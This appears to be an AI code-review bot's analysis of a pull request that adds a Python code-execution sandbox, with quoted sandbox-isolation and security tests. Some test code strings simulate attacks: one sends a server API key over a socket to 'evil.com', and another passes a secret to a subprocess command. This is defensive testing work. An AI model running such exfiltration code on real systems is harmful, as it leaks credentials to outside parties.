find . -name "sandbox.py" -type f | head -5Length of output: 35
🏁 Script executed:
#!/bin/bash
# Find the test file mentioned in the review
find . -name "test_validate.py" -type f | head -5Length of output: 151
🏁 Script executed:
#!/bin/bash
# Examine the validate.py file under review (lines 1-80 for context)
cat ./src/lfx/src/lfx/custom/validate.py | head -80Length of output: 2960
🏁 Script executed:
#!/bin/bash
# Examine sandbox.py to understand exception types and create_isolated_import behavior
cat ./src/lfx/src/lfx/custom/sandbox.pyLength of output: 8868
🏁 Script executed:
#!/bin/bash
# Search for test_code_with_multiple_imports in test files
rg -n "test_code_with_multiple_imports" ./src/backend/tests/unit/utils/ ./src/lfx/tests/Length of output: 98
🏁 Script executed:
#!/bin/bash
# Examine the test file to see test_code_with_multiple_imports expectations
cat ./src/backend/tests/unit/utils/test_validate.py | sed -n '123,160p'Length of output: 1431
🏁 Script executed:
#!/bin/bash
# Get more context around that test, including imports and setup
cat ./src/backend/tests/unit/utils/test_validate.py | sed -n '1,50p'Length of output: 1298
🏁 Script executed:
#!/bin/bash
# Search for other tests that check import errors count
rg -n "imports.*errors" ./src/backend/tests/unit/utils/test_validate.py -A 2 -B 2Length of output: 1276
🏁 Script executed:
#!/bin/bash
# Check the other tests that expect empty imports errors or specific counts
cat ./src/backend/tests/unit/utils/test_validate.py | sed -n '55,92p'Length of output: 1192
🏁 Script executed:
#!/bin/bash
# Check if there's any setup/teardown that sets the environment variable
rg -n "LANGFLOW_ALLOW_DANGEROUS_CODE" ./src/backend/tests/unit/utils/test_validate.pyLength of output: 0
🏁 Script executed:
#!/bin/bash
# Check if this test file has any class setup or pytest fixtures
grep -n "setUp\|@pytest.fixture\|@classmethod" ./src/backend/tests/unit/utils/test_validate.py | head -20Length of output: 0
🏁 Script executed:
#!/bin/bash
# Verify the exact lines in validate.py where exception handling occurs (51-73)
cat ./src/lfx/src/lfx/custom/validate.py | sed -n '51,75p'Length of output: 1298
🏁 Script executed:
#!/bin/bash
# Double-check that os and sys are indeed in BLOCKED_MODULES
grep -n "\"os\"\|\"sys\"" ./src/lfx/src/lfx/custom/sandbox.pyLength of output: 26
Update test expectations for new sandbox behavior in test_code_with_multiple_imports
The sandboxing change correctly surfaces blocked modules (e.g., os, sys) as import errors via SecurityViolation, which is caught by the generic except Exception handler. However, test_code_with_multiple_imports imports both os and sys (both in BLOCKED_MODULES) and expects exactly 2 errors for nonexistent modules only. After this change, the test will receive 4 errors: os, sys, nonexistent1, and nonexistent2, causing the assertion assert len(result["imports"]["errors"]) == 2 to fail.
Suggested fixes:
- Update the test to either:
- Remove
osandsysfrom the test code if only testing nonexistent modules - Update the assertion to expect 4 errors if the intent is testing mixed scenarios
- Remove
- Or, distinguish between
SecurityViolationandModuleNotFoundErrorin validate.py if dangerous modules should not be counted as validation errors (though blocking them at import time is better for security)
Test file: ./src/backend/tests/unit/utils/test_validate.py (lines 123-138)
🤖 Prompt for AI Agents
In src/lfx/src/lfx/custom/validate.py around lines 11-12, the sandbox now raises
SecurityViolation for blocked modules (e.g., os, sys) which are being caught by
the generic exception handler and counted as import errors, causing tests that
expect only ModuleNotFoundError counts to fail; to fix, either update the unit
test ./src/backend/tests/unit/utils/test_validate.py (lines 123-138) to remove
os/sys from the test input or change the assertion to expect 4 errors, or modify
validate.py to catch SecurityViolation separately and either skip adding it to
imports["errors"] or classify it under a distinct imports["blocked"] key
(implement by adding an except SecurityViolation: branch that handles/filters
those exceptions before the generic except Exception).
| def test_sandbox_cannot_access_parent_globals(): | ||
| """Test that sandboxed code cannot access parent function's globals.""" | ||
| # Set a variable in the parent scope | ||
| parent_var = "should_not_be_accessible" | ||
|
|
||
| code = """ | ||
| def test(): | ||
| # Try to access parent_var from parent scope | ||
| # If isolation were broken, this would work | ||
| return parent_var | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| # Execute in sandbox | ||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Try to call the function | ||
| test_func = exec_globals["test"] | ||
|
|
||
| # Should raise NameError because parent_var is not accessible | ||
| with pytest.raises(NameError): | ||
| test_func() | ||
|
|
||
|
|
||
| def test_sandbox_cannot_modify_parent_globals(): | ||
| """Test that sandboxed code cannot modify parent scope's globals.""" | ||
| parent_dict = {"value": "original"} | ||
|
|
||
| code = """ | ||
| def test(): | ||
| # Try to modify parent_dict | ||
| # If isolation were broken, this would modify the real parent_dict | ||
| parent_dict["value"] = "modified" | ||
| return parent_dict["value"] | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function - should fail because parent_dict is not accessible | ||
| test_func = exec_globals["test"] | ||
|
|
||
| with pytest.raises(NameError): | ||
| test_func() | ||
|
|
||
| # Verify parent_dict was not modified | ||
| assert parent_dict["value"] == "original" | ||
|
|
||
|
|
||
| def test_sandbox_isolated_builtins(): | ||
| """Test that sandbox uses isolated builtins, not real ones.""" | ||
| # Create a marker in real builtins (simulating server state) | ||
| import builtins | ||
| original_builtins_len = len(dir(builtins)) | ||
|
|
||
| code = """ | ||
| def test(): | ||
| import builtins | ||
| # Try to access real builtins | ||
| # If isolation were broken, we could modify real builtins | ||
| builtins.ESCAPE_TEST = "should_not_exist" | ||
| return hasattr(builtins, 'ESCAPE_TEST') | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function | ||
| test_func = exec_globals["test"] | ||
| result = test_func() | ||
|
|
||
| # Should return False or True but not affect real builtins | ||
| # Verify real builtins wasn't modified | ||
| assert not hasattr(builtins, "ESCAPE_TEST") | ||
| assert len(dir(builtins)) == original_builtins_len | ||
|
|
||
|
|
||
| def test_sandbox_fresh_namespace_per_execution(): | ||
| """Test that each execution gets a fresh isolated namespace.""" | ||
| code1 = """ | ||
| GLOBAL_VAR = "first_execution" | ||
| def test(): | ||
| return GLOBAL_VAR | ||
| """ | ||
| code_obj1 = compile(code1, "<test>", "exec") | ||
| exec_globals1 = {} | ||
| execute_in_sandbox(code_obj1, exec_globals1) | ||
|
|
||
| # Second execution with different code | ||
| code2 = """ | ||
| def test(): | ||
| # Try to access GLOBAL_VAR from previous execution | ||
| # If isolation were broken, this would work | ||
| return GLOBAL_VAR | ||
| """ | ||
| code_obj2 = compile(code2, "<test>", "exec") | ||
| exec_globals2 = {} | ||
| execute_in_sandbox(code_obj2, exec_globals2) | ||
|
|
||
| # Should raise NameError because GLOBAL_VAR doesn't exist in this execution | ||
| test_func = exec_globals2["test"] | ||
| with pytest.raises(NameError): | ||
| test_func() | ||
|
|
||
|
|
||
| def test_sandbox_cannot_access_frame_locals(): | ||
| """Test that sandboxed code cannot access caller's local variables.""" | ||
| def caller_function(): | ||
| local_var = "should_not_be_accessible" | ||
|
|
||
| code = """ | ||
| def test(): | ||
| # Try to access local_var from caller | ||
| # If isolation were broken, this would work | ||
| return local_var | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function | ||
| test_func = exec_globals["test"] | ||
|
|
||
| # Should raise NameError because local_var is not accessible | ||
| with pytest.raises(NameError): | ||
| test_func() | ||
|
|
||
| caller_function() | ||
|
|
||
|
|
||
| def test_sandbox_isolated_imports(): | ||
| """Test that imports in sandbox are isolated from parent scope.""" | ||
| # Set up a mock module in parent scope (simulating server state) | ||
| import sys | ||
| original_modules = set(sys.modules.keys()) | ||
|
|
||
| code = """ | ||
| import json | ||
| def test(): | ||
| # Import json - should be isolated | ||
| return json.__name__ | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function | ||
| test_func = exec_globals["test"] | ||
| result = test_func() | ||
|
|
||
| # Should work but json import should be isolated | ||
| assert result == "json" | ||
|
|
||
| # Verify we didn't accidentally modify sys.modules in a way that persists | ||
| # (though importlib.import_module does modify sys.modules, the key is that | ||
| # the sandbox's view of modules is isolated) | ||
| current_modules = set(sys.modules.keys()) | ||
| # New modules might be added, but that's expected for imports | ||
|
|
||
|
|
||
| def test_sandbox_function_definition_time_isolation(): | ||
| """Test that function definition time code (default args) executes in isolation.""" | ||
| parent_var = "should_not_be_accessible" | ||
|
|
||
| code = """ | ||
| def test(x=parent_var): | ||
| # Default argument evaluation happens at definition time | ||
| # If isolation were broken, parent_var would be accessible | ||
| return x | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| # Execute in sandbox - definition time code runs here | ||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Try to call the function | ||
| test_func = exec_globals["test"] | ||
|
|
||
| # Should raise NameError when function is defined (default arg evaluation) | ||
| # OR when called without args | ||
| # The key is that parent_var is not accessible during definition | ||
| with pytest.raises(NameError): | ||
| test_func() # Calling without args triggers default arg evaluation | ||
|
|
||
|
|
||
| def test_sandbox_decorator_isolation(): | ||
| """Test that decorator evaluation happens in isolation.""" | ||
| parent_var = "should_not_be_accessible" | ||
|
|
||
| code = """ | ||
| @(parent_var or lambda f: f) | ||
| def test(): | ||
| return 1 | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| # Execute in sandbox - decorator evaluation happens here | ||
| # Should raise NameError because parent_var is not accessible | ||
| with pytest.raises(NameError): | ||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
🧩 Analysis chain
Tests assume exec_globals is populated by execute_in_sandbox, but the implementation does not do that
All of these tests follow the pattern:
exec_globals = {}
execute_in_sandbox(code_obj, exec_globals)
test_func = exec_globals["test"]
test_func()However, execute_in_sandbox currently creates an internal sandbox_globals dict, updates it with exec_globals, and executes the code there without writing any new names (like test) back into exec_globals. As written, exec_globals["test"] will raise KeyError, so the assertions about NameError and isolation never actually run.
To make these tests exercise the real contract of execute_in_sandbox, you probably want one of:
- Change
execute_in_sandboxto treatexec_globalsas the sandbox globals (and let exec populate it), or to return the sandbox namespace so tests can pull outtestfrom the returned dict, or - Restructure tests to assert on exceptions raised directly from
execute_in_sandbox(e.g., have the code string calltest()at module top level so aNameErroroccurs during exec), instead of trying to retrieve and call the function afterwards.
Also, test_sandbox_isolated_builtins assumes that mutating builtins inside the sandbox cannot affect the process‑wide builtins module. Given create_isolated_import currently delegates to importlib.import_module, you may still be importing the real builtins module inside the sandbox; verify this expectation against the actual sandbox implementation.
---
🏁 Script executed:
```shell
#!/bin/bash
# Find sandbox-related files and the execute_in_sandbox function
fd -t f "sandbox" --type python | head -20
Length of output: 173
🏁 Script executed:
#!/bin/bash
# Search for execute_in_sandbox definition
rg -n "def execute_in_sandbox" --type pythonLength of output: 30
🏁 Script executed:
#!/bin/bash
# Search for create_isolated_import and create_isolated_builtins
rg -n "def create_isolated_(import|builtins)" --type pythonLength of output: 30
🏁 Script executed:
#!/bin/bash
# Verify the test file exists and show first few test patterns
cat src/lfx/tests/unit/custom/test_sandbox_isolation.py | head -60Length of output: 1759
---
🏁 Script executed:
```shell
#!/bin/bash
# Find sandbox.py or related sandbox implementation
fd sandbox -e py
Length of output: 136
🏁 Script executed:
#!/bin/bash
# Search for execute_in_sandbox definition with correct syntax
rg -n "def execute_in_sandbox" -g "*.py"Length of output: 114
🏁 Script executed:
#!/bin/bash
# Search for sandbox-related imports and implementations
rg -n "execute_in_sandbox|create_isolated" -g "*.py" -A 5Length of output: 13244
🏁 Script executed:
#!/bin/bash
# Look for the custom module structure
find . -type d -name custom | head -10Length of output: 119
---
🏁 Script executed:
```shell
#!/bin/bash
# Get full execute_in_sandbox implementation
sed -n '176,250p' src/lfx/src/lfx/custom/sandbox.py
Length of output: 2592
🏁 Script executed:
#!/bin/bash
# Get create_isolated_builtins implementation
sed -n '88,139p' src/lfx/src/lfx/custom/sandbox.pyLength of output: 2274
🏁 Script executed:
#!/bin/bash
# Get create_isolated_import implementation
sed -n '140,175p' src/lfx/src/lfx/custom/sandbox.pyLength of output: 1712
🏁 Script executed:
#!/bin/bash
# Check the full sandbox.py to see how sandbox_globals is used
wc -l src/lfx/src/lfx/custom/sandbox.pyLength of output: 37
Tests assume exec_globals is populated after execute_in_sandbox() returns, but the implementation does not do this
The core issue: execute_in_sandbox creates an internal sandbox_globals dict, merges exec_globals into it (line 218), executes code in that dict, and returns None without writing anything back to exec_globals. All tests then try to access exec_globals["test"], which will raise KeyError before any isolation assertions run.
Every test in this module follows the failing pattern:
exec_globals = {}
execute_in_sandbox(code_obj, exec_globals)
test_func = exec_globals["test"] # KeyError - exec_globals was never modifiedTo fix this, either:
- Modify
execute_in_sandboxto return the sandbox namespace (or write it back toexec_globals), or - Restructure tests to assert on exceptions during
execute_in_sandboxitself (e.g., have code call the test function at module level soNameErroroccurs during exec)
Additionally, create_isolated_import uses importlib.import_module(), which returns the real builtins module, not the IsolatedBuiltinsModule wrapper. This means code that does import builtins gets the actual module, and mutations inside the sandbox could affect the process-wide builtins. Verify whether this matches your isolation intent.
🤖 Prompt for AI Agents
In src/lfx/tests/unit/custom/test_sandbox_isolation.py around lines 11-218,
tests assume execute_in_sandbox populates the passed exec_globals with the
executed namespace but the current implementation builds an internal
sandbox_globals, executes into it and returns None (line ~218), leaving
exec_globals empty and causing KeyError; fix by changing execute_in_sandbox to
either write the final sandbox namespace back into the provided exec_globals
dict (e.g., clear exec_globals and update it with sandbox_globals) or return the
sandbox namespace and update callers/tests accordingly so exec_globals["test"]
exists after execution; also address create_isolated_import returning real
modules (not wrappers) by ensuring the sandboxed import mechanism injects
isolated module objects (or a wrapped builtins module) into the sandbox's
sys.modules/builtins mapping during exec so an in-sandbox "import builtins"
yields the isolated builtins rather than the process-wide one.
| def test_sandbox_cannot_access_server_python_secrets(): | ||
| """CRITICAL: Test that sandboxed code cannot access server's Python variables/secrets. | ||
    This is the KEY security property - code cannot access server secrets stored in memory.
    Even if code can do file I/O or network requests, it can't access server secrets to exfiltrate.
    """
    # Simulate server secrets stored in Python variables
    server_api_key = "sk-secret-key-12345"
    server_db_password = "db_password_secret"
    server_config = {
        "api_key": server_api_key,
        "database_url": "postgresql://user:password@localhost/db"
    }

    code = """
def test():
    # Try to access server's Python variables containing secrets
    # If isolation is broken, these would be accessible
    return server_api_key, server_db_password, server_config
"""
    code_obj = compile(code, "<test>", "exec")
    exec_globals = {}

    execute_in_sandbox(code_obj, exec_globals)

    # Call the function
    test_func = exec_globals["test"]

    # CRITICAL: Should raise NameError - server secrets are not accessible
    # This is what prevents credential theft
    with pytest.raises(NameError):
        test_func()


def test_sandbox_cannot_access_server_credentials_via_python():
    """Test that code cannot access server credentials stored in Python variables.
    Even if code can do file I/O or network requests, it can't access server secrets
    stored in Python variables to exfiltrate them.
    """
    # Simulate server storing credentials in Python variables
    class ServerConfig:
        def __init__(self):
            self.api_key = "sk-secret-12345"
            self.database_url = "postgresql://user:pass@localhost/db"
            self.secret_token = "token_secret_xyz"

    server_config = ServerConfig()

    code = """
def test():
    # Try to access server's credential objects
    # If isolation is broken, we could access server_config.api_key
    return server_config.api_key
"""
    code_obj = compile(code, "<test>", "exec")
    exec_globals = {}

    execute_in_sandbox(code_obj, exec_globals)

    # Call the function
    test_func = exec_globals["test"]

    # CRITICAL: Should raise NameError - server_config is not accessible
    # This prevents credential theft even if code can do file I/O or network requests
    with pytest.raises(NameError):
        test_func()


def test_sandbox_cannot_access_server_python_state():
    """Test that code cannot access server's Python state, even if it can access system resources.
    This is the key security property: namespace isolation prevents access to server secrets
    stored in Python variables, even though code can access system resources like os.environ.
    """
    # Server stores secrets in Python variables (not just env vars)
    server_secrets = {
        "api_key": "sk-secret-from-python-var",
        "db_password": "password-from-python-var"
    }

    code = """
import os
def test():
    # Code CAN access os.environ (system resource)
    env_key = os.environ.get('TEST_ENV_VAR', 'not_found')
    # But code CANNOT access server's Python variables
    # If isolation is broken, server_secrets would be accessible
    python_secret = server_secrets['api_key']
    return env_key, python_secret
"""
    code_obj = compile(code, "<test>", "exec")
    exec_globals = {}

    # Set env var to test that system resources ARE accessible
    os.environ["TEST_ENV_VAR"] = "env_value"

    try:
        execute_in_sandbox(code_obj, exec_globals)

        # Call the function
        test_func = exec_globals["test"]

        # Should raise NameError - server_secrets Python variable is not accessible
        # This proves namespace isolation works, even though os.environ is accessible
        with pytest.raises(NameError):
            test_func()
    finally:
        if "TEST_ENV_VAR" in os.environ:
            del os.environ["TEST_ENV_VAR"]


def test_sandbox_cannot_exfiltrate_secrets_via_commands():
    """Test that code cannot access server secrets to pass to system commands.
    Code CAN execute system commands, but it CANNOT access server secrets
    stored in Python variables to pass to those commands.
    """
    # Server secret stored in Python variable
    server_secret = "secret_password_12345"

    code = """
import subprocess
def test():
    # Code CAN execute commands
    # But code CANNOT access server_secret to pass to command
    # If isolation is broken, we could do: subprocess.run(['echo', server_secret])
    result = subprocess.check_output(['echo', server_secret], text=True)
    return result.strip()
"""
    code_obj = compile(code, "<test>", "exec")
    exec_globals = {}

    execute_in_sandbox(code_obj, exec_globals)

    # Call the function
    test_func = exec_globals["test"]

    # CRITICAL: Should raise NameError - server_secret is not accessible
    # This prevents code from exfiltrating secrets via system commands
    with pytest.raises(NameError):
        test_func()


def test_sandbox_cannot_access_server_python_variables():
    """Test that sandboxed code cannot access server's Python variables/state.
    This is what namespace isolation actually prevents.
    """
    # Set a variable in the "server" scope
    server_secret = "server_secret_value"
    server_config = {"api_key": "secret_key_123"}

    code = """
def test():
    # Try to access server's Python variables
    # If isolation is broken, these would be accessible
    return server_secret, server_config
"""
    code_obj = compile(code, "<test>", "exec")
    exec_globals = {}

    execute_in_sandbox(code_obj, exec_globals)

    # Call the function
    test_func = exec_globals["test"]

    # Should raise NameError - server variables are not accessible
    with pytest.raises(NameError):
        test_func()


def test_sandbox_cannot_modify_server_python_state():
    """Test that sandboxed code cannot modify server's Python state."""
    server_state = {"modified": False}

    code = """
def test():
    # Try to modify server state
    server_state["modified"] = True
    return server_state
"""
    code_obj = compile(code, "<test>", "exec")
    exec_globals = {}

    execute_in_sandbox(code_obj, exec_globals)

    # Call the function
    test_func = exec_globals["test"]

    # Should raise NameError - server_state is not accessible
    with pytest.raises(NameError):
        test_func()

    # Verify server state was not modified
    assert server_state["modified"] is False


def test_sandbox_cannot_exfiltrate_secrets_via_network():
    """Test that code cannot access server secrets to send via network requests.
    Code CAN make network requests, but it CANNOT access server secrets
    stored in Python variables to send in those requests.
    """
    # Server secret stored in Python variable
    server_api_key = "sk-secret-key-to-exfiltrate"

    code = """
import socket
def test():
    # Code CAN make network requests
    # But code CANNOT access server_api_key to send
    # If isolation is broken, we could do: socket.send(server_api_key.encode())
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('evil.com', 1337))
    s.send(server_api_key.encode())  # Try to send server secret
    s.close()
    return 'sent'
"""
    code_obj = compile(code, "<test>", "exec")
    exec_globals = {}

    execute_in_sandbox(code_obj, exec_globals)

    # Call the function
    test_func = exec_globals["test"]

    # CRITICAL: Should raise NameError - server_api_key is not accessible
    # This prevents code from exfiltrating secrets via network requests
    with pytest.raises(NameError):
        test_func()
🧩 Analysis chain
Security tests don’t match the current sandbox contract and may be brittle
A few intertwined issues here:

1. Namespace contract mismatch (same as isolation tests)
   Every test does:

       exec_globals = {}
       execute_in_sandbox(code_obj, exec_globals)
       test_func = exec_globals["test"]

   But execute_in_sandbox builds its own sandbox_globals dict and never writes back into exec_globals, so exec_globals["test"] will raise KeyError before any NameError about server_* variables can be observed. Either adjust execute_in_sandbox to expose the sandbox namespace (e.g., by mutating or returning it) or rewrite the tests to assert on exceptions raised directly from execute_in_sandbox.

2. Assumptions about dangerous modules being usable
   Several tests assume os, subprocess, and socket imports succeed and that only access to server-side Python variables is blocked. The sandbox implementation, however, is documented to block these modules by default unless LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION is enabled. Without that toggle set, these tests are likely to fail at import time with a security error rather than the intended NameError. Consider:
   - Explicitly setting/resetting the env flag in a fixture for these tests, or
   - Splitting tests to cover both "dangerous allowed" and "dangerous blocked" modes, asserting on the correct exception type in each.

3. Real subprocess/network usage in unit tests
   subprocess.check_output and socket.connect/send are being called for real. Even if the name-resolution failure is ultimately what you want to assert, the code will still attempt to open processes and network connections first, which can make tests flaky or environment-dependent. Stubbing these (e.g., monkeypatch or patch subprocess.check_output / socket.socket) would keep the tests focused purely on namespace isolation semantics.

Overall, the intent of these tests is good, but they need to be brought in line with how execute_in_sandbox and the "dangerous modules" toggle actually behave.
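To make the stubbing point concrete, here is a rough sketch (not code from the PR) of a test that asserts on the sandbox call itself instead of reaching into exec_globals; the import path and the SecurityViolation name come from the PR's sandbox module, while the exact failure mode is an assumption about the default (blocked) configuration:

```python
import pytest

from lfx.custom.sandbox import SecurityViolation, execute_in_sandbox


def test_sandbox_blocks_subprocess_import_by_default(monkeypatch):
    # Assumption: with dangerous code disabled (the default), the blocked
    # `import subprocess` surfaces as SecurityViolation from execute_in_sandbox,
    # so no real process is ever spawned and no KeyError masking occurs.
    monkeypatch.delenv("LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION", raising=False)

    code = """
import subprocess

def test():
    return subprocess.check_output(["echo", "hi"], text=True)
"""
    code_obj = compile(code, "<test>", "exec")

    with pytest.raises(SecurityViolation):
        execute_in_sandbox(code_obj, {})
```

Note that if the flag is cached at sandbox import time, the monkeypatch.delenv call is only a defensive reset, not a reliable toggle.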
I'll verify the review comment by examining the actual execute_in_sandbox implementation and related sandbox configuration.
---
🏁 Script executed:

```shell
#!/bin/bash
# Find execute_in_sandbox function definition
rg -n "def execute_in_sandbox" --type py -A 15
```

Length of output: 1394

🏁 Script executed:

```shell
#!/bin/bash
# Search for LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION usage
rg -n "LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION" --type py -C 2
```

Length of output: 3463

🏁 Script executed:

```shell
#!/bin/bash
# Find sandbox module and dangerous modules handling
rg -n "dangerous.*module|block.*import" --type py -i -C 3
```

Length of output: 15508

🏁 Script executed:

```shell
#!/bin/bash
# Check test file imports at the top of test_sandbox_security.py
head -n 30 src/lfx/tests/unit/custom/test_sandbox_security.py
```

Length of output: 1281

🏁 Script executed:

```shell
#!/bin/bash
# Search for where globals dict is populated or returned in sandbox
rg -n "exec_globals|sandbox_globals" --type py -B 2 -A 5 | head -100
```

Length of output: 7723

I need to see the full implementation of execute_in_sandbox to verify whether it mutates exec_globals and when the dangerous module errors occur.

---

🏁 Script executed:

```shell
#!/bin/bash
# Get full execute_in_sandbox implementation
sed -n '176,210p' src/lfx/src/lfx/custom/sandbox.py
```

Length of output: 1518

🏁 Script executed:

```shell
#!/bin/bash
# Get the complete sandbox_globals creation and execution logic
sed -n '200,230p' src/lfx/src/lfx/custom/sandbox.py
```

Length of output: 1156

🏁 Script executed:

```shell
#!/bin/bash
# Look for where globals dict is populated after exec
rg -n "sandbox_globals\|exec_globals" src/lfx/src/lfx/custom/sandbox.py -A 3 -B 1
```

Length of output: 0

🏁 Script executed:

```shell
#!/bin/bash
# Check if there are fixtures in test_sandbox_security.py that set the env var
grep -n "LANGFLOW_ALLOW_DANGEROUS_CODE\|monkeypatch\|setenv" src/lfx/tests/unit/custom/test_sandbox_security.py
```

Length of output: 0

I need to see the end of the execute_in_sandbox function to understand if exec_globals is mutated with the sandbox results.

---

🏁 Script executed:

```shell
#!/bin/bash
# Get the complete execute_in_sandbox function from line 230 onward
sed -n '230,250p' src/lfx/src/lfx/custom/sandbox.py
```

Length of output: 424

🏁 Script executed:

```shell
#!/bin/bash
# Get the entire execute_in_sandbox function in one view
awk '/^def execute_in_sandbox/,/^def [a-z_]/ {print NR": "$0}' src/lfx/src/lfx/custom/sandbox.py | head -80
```

Length of output: 81

🏁 Script executed:

```shell
#!/bin/bash
# Count total lines in sandbox.py and get end of function
wc -l src/lfx/src/lfx/custom/sandbox.py
```

Length of output: 37

🏁 Script executed:

```shell
#!/bin/bash
# Get lines 230-260 to see exec call and what happens
sed -n '230,260p' src/lfx/src/lfx/custom/sandbox.py
```

Length of output: 424
Security tests won't pass with current sandbox implementation and are brittle
The review comment accurately identifies three real issues:
1. exec_globals dict is never populated (confirmed)
   execute_in_sandbox merges exec_globals into sandbox_globals at line 224, executes code in sandbox_globals, but never writes results back. Tests calling exec_globals["test"] will raise KeyError before assertions are reached.

2. Dangerous modules fail at import time with SecurityViolation (confirmed)
   Tests assume import os, import subprocess, and import socket succeed. However, when exec() runs the code at line 232, these imports trigger create_isolated_import(), which raises SecurityViolation (lines 155-160) because ALLOW_DANGEROUS_CODE defaults to false. The function re-raises this exception, so tests fail before reaching the intended NameError assertions. No fixtures set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true.

3. Real subprocess/network I/O (would occur if imports succeeded)
   subprocess.check_output and socket.connect('evil.com', 1337) execute for real, making tests flaky and environment-dependent.
Recommendation: Either refactor execute_in_sandbox to populate exec_globals with the sandbox namespace results, or rewrite tests to assert on exceptions from execute_in_sandbox itself and use pytest fixtures to explicitly enable/disable dangerous modules for different test scenarios.
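For the "dangerous allowed" scenarios, a fixture along these lines could make the toggle explicit; the fixture name is illustrative, and reloading the module is an assumption that follows from the flag being read once at import time:

```python
import importlib

import pytest


@pytest.fixture
def sandbox_with_dangerous_code(monkeypatch):
    """Illustrative fixture: enable dangerous code, reload the sandbox, then restore."""
    monkeypatch.setenv("LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION", "true")
    from lfx.custom import sandbox

    importlib.reload(sandbox)  # assumption: the flag is cached at module import time
    yield sandbox

    monkeypatch.delenv("LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION", raising=False)
    importlib.reload(sandbox)  # restore the default (blocked) behavior for other tests
```

Tests using this fixture should still monkeypatch subprocess.check_output and socket.socket so that no real processes or connections are created.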
🧰 Tools
🪛 Gitleaks (8.29.0)
[high] 30-30: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
[high] 66-66: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
🤖 Prompt for AI Agents
In src/lfx/tests/unit/custom/test_sandbox_security.py around lines 23-256, the
tests fail because execute_in_sandbox does not write back the sandbox namespace
into the provided exec_globals, dangerous-module imports raise SecurityViolation
at exec time (so tests never reach NameError assertions), and tests allow real
subprocess/socket IO; fix by (1) updating execute_in_sandbox to merge the final
sandbox_globals back into the provided exec_globals so test_func is available to
callers, (2) change these tests to either enable dangerous imports via a
dedicated pytest fixture/env var when you intend to allow them or assert that
execute_in_sandbox raises SecurityViolation for blocked imports (instead of
expecting NameError), and (3) prevent real external IO by monkeypatching/mocking
subprocess and socket calls (or replace those test cases with mocks/stubs) so
tests remain deterministic and do not perform network/command execution.
    # Simulate server secrets stored in Python variables
    server_api_key = "sk-secret-key-12345"
    server_db_password = "db_password_secret"
    server_config = {
        "api_key": server_api_key,
        "database_url": "postgresql://user:password@localhost/db"
    }
Hard‑coded “API key”‑like test strings will keep tripping secret scanners
Strings like "sk-secret-key-12345", "sk-secret-12345", and "sk-secret-key-to-exfiltrate" look like real API keys to tools such as gitleaks, which is already flagging them. Even though they’re harmless test values, they’ll continue to generate noise or block CI unless suppressed.
A low‑friction fix is to tweak them so they no longer match common key patterns, e.g.:
"sk-test-not-a-real-key-12345""dummy-secret-key"
or similar, or centralize them in a constant that scanners are configured to ignore.
Also applies to: 64-69, 100-102, 144-145, 175-177, 229-231
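One low-friction shape for this (constant names are illustrative, not from the PR) is a pair of module-level placeholders that avoid the sk- prefix the generic-api-key rule keys on, with an inline allowlist comment as a fallback:

```python
# Placeholder secrets used only by the sandbox security tests.
FAKE_API_KEY = "dummy-not-a-real-key-12345"  # avoids generic API key patterns
FAKE_DB_PASSWORD = "dummy-db-password"  # gitleaks:allow (inline allowlist, if still flagged)
```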
🧰 Tools
🪛 Gitleaks (8.29.0)
[high] 30-30: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
Actionable comments posted: 9
Caution
Some comments are outside the diff and can’t be posted inline due to platform limitations.
⚠️ Outside diff range comments (1)
src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (1)
2338-2355: Unsafe default: Allow Dangerous Deserialization is enabled. Defaulting allow_dangerous_deserialization to true can lead to arbitrary code execution when loading FAISS indexes. For a starter template, ship it disabled.

- BoolInput(
-     name="allow_dangerous_deserialization",
-     display_name="Allow Dangerous Deserialization",
-     ...
-     value=True,
- ),
+ BoolInput(
+     name="allow_dangerous_deserialization",
+     display_name="Allow Dangerous Deserialization",
+     ...
+     value=False,
+ ),

If you must load untrusted indexes, gate it with an environment flag and warn prominently in the UI.
🧹 Nitpick comments (6)
src/backend/tests/unit/utils/test_validate.py (1)
54-151: Consider adding dedicated sandbox security tests. The PR introduces a security sandbox to block dangerous operations, but this test file doesn't appear to include tests that specifically verify sandbox blocking behavior. Consider adding tests for:
Blocked operations - Verify that dangerous operations are blocked:
- File system access (open(), os.remove(), os.system())
- Subprocess execution (subprocess.run(), os.popen())
- Network operations (socket, urllib, requests)
- Module imports (__import__, importlib with dangerous modules)
Allowed operations - Verify safe operations still work:
- Standard math/string operations
- Safe stdlib modules (math, json, typing, etc.)
Global setting - The AI summary mentions "a new global setting controls whether dangerous code operations are permitted during validation." Add tests to verify:
- Setting can enable/disable dangerous operations
- Setting is respected by validation logic
